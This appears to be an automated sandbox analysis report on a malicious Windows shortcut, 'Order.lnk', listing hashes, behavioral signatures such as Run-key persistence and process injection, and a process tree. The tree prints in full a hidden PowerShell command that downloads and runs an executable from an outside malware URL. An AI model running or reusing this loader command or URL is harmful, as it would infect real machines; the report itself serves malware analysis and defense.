Analysis
-
max time kernel
11s -
max time network
12s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
26-03-2024 10:27
Static task
static1
Behavioral task
behavioral1
Sample
Order/Order.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Order/Order.lnk
Resource
win10v2004-20240226-en
General
-
Target
Order/Order.lnk
-
Size
2KB
-
MD5
f88d5c71b79d93f336a5fbc20deeb9dd
-
SHA1
1f77d2879725462577a73adbf83d07c60eb6a384
-
SHA256
a4e51b364548e87948d0075a8adffcd901d2876950ce6f0a939413a0d450b752
-
SHA512
e369ed33574528497c330c79630e49971b4398bc089f239648c270774a62086436a36503db5052d9df72a56a0a8113ac0c9c09e7d86b41ad999c15e1cfc404d2
Malware Config
Extracted
http://busyestinglsv.site/cmeo/ahbsfrbahogrfoweybrzhfbshdlhabdfhbawvgfrweifrvboherjbvfwr/zxfhvgkhchbavsdfabvlgf1244rhgv5hvkghvkhvkh6vkgvh/clips.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 5092 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1412 yjtjewi.exe -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tgb = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Order\\yjtjewi.exe" yjtjewi.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000a0000000231f7-19.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1412 set thread context of 2084 1412 yjtjewi.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2296 2084 WerFault.exe 100 -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5092 powershell.exe 5092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5092 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1412 yjtjewi.exe 1412 yjtjewi.exe 1412 yjtjewi.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1412 yjtjewi.exe 1412 yjtjewi.exe 1412 yjtjewi.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1224 wrote to memory of 5092 1224 cmd.exe 89 PID 1224 wrote to memory of 5092 1224 cmd.exe 89 PID 5092 wrote to memory of 2768 5092 powershell.exe 90 PID 5092 wrote to memory of 2768 5092 powershell.exe 90 PID 5092 wrote to memory of 1412 5092 powershell.exe 99 PID 5092 wrote to memory of 1412 5092 powershell.exe 99 PID 5092 wrote to memory of 1412 5092 powershell.exe 99 PID 1412 wrote to memory of 2084 1412 yjtjewi.exe 100 PID 1412 wrote to memory of 2084 1412 yjtjewi.exe 100 PID 1412 wrote to memory of 2084 1412 yjtjewi.exe 100 PID 1412 wrote to memory of 2084 1412 yjtjewi.exe 100
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Order\Order.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://busyestinglsv.site/cmeo/ahbsfrbahogrfoweybrzhfbshdlhabdfhbawvgfrweifrvboherjbvfwr/zxfhvgkhchbavsdfabvlgf1244rhgv5hvkghvkhvkh6vkgvh/clips.exe','yjtjewi.exe');./'yjtjewi.exe';(get-item 'yjtjewi.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\system32\OpenWith.exe"C:\Windows\system32\OpenWith.exe"3⤵PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\Order\yjtjewi.exe"C:\Users\Admin\AppData\Local\Temp\Order\yjtjewi.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:2084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 805⤵
- Program crash
PID:2296
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2084 -ip 20841⤵PID:3892
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
926KB
MD53deef79bb599036ce546fcc8db2a454f
SHA153484b19b20040c56e1101cad9be8a981bcf3e31
SHA256eba68f3151d5fa565b6545341bc80f1353af4d43545335643d450ba0b3653b06
SHA5126e947f4b44ebaeae5b6cb0ae1222e24a8999ddeeecb5248d83249f120a3005403e780f5e3612039e234b4931057d6fdd2d4afac23ffd0e87e0f331d6f8f42542
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
104KB
MD53286d0dfdd1416b2a478739e2cc2e456
SHA1a893e482016cbef3984bc52483e1b551a1a32638
SHA25615e91c2587a346dea656a42c37697db0fbdd0682315b64fd6270a07181030f9b
SHA51248b92bf8ddfa8e4d116c1394feb5e64c36838d130bc53ddadcfb8c1df38ec209e26e10a1d9829ebcf005d3e462636eef330d23d298986b76f74368fa06b5d068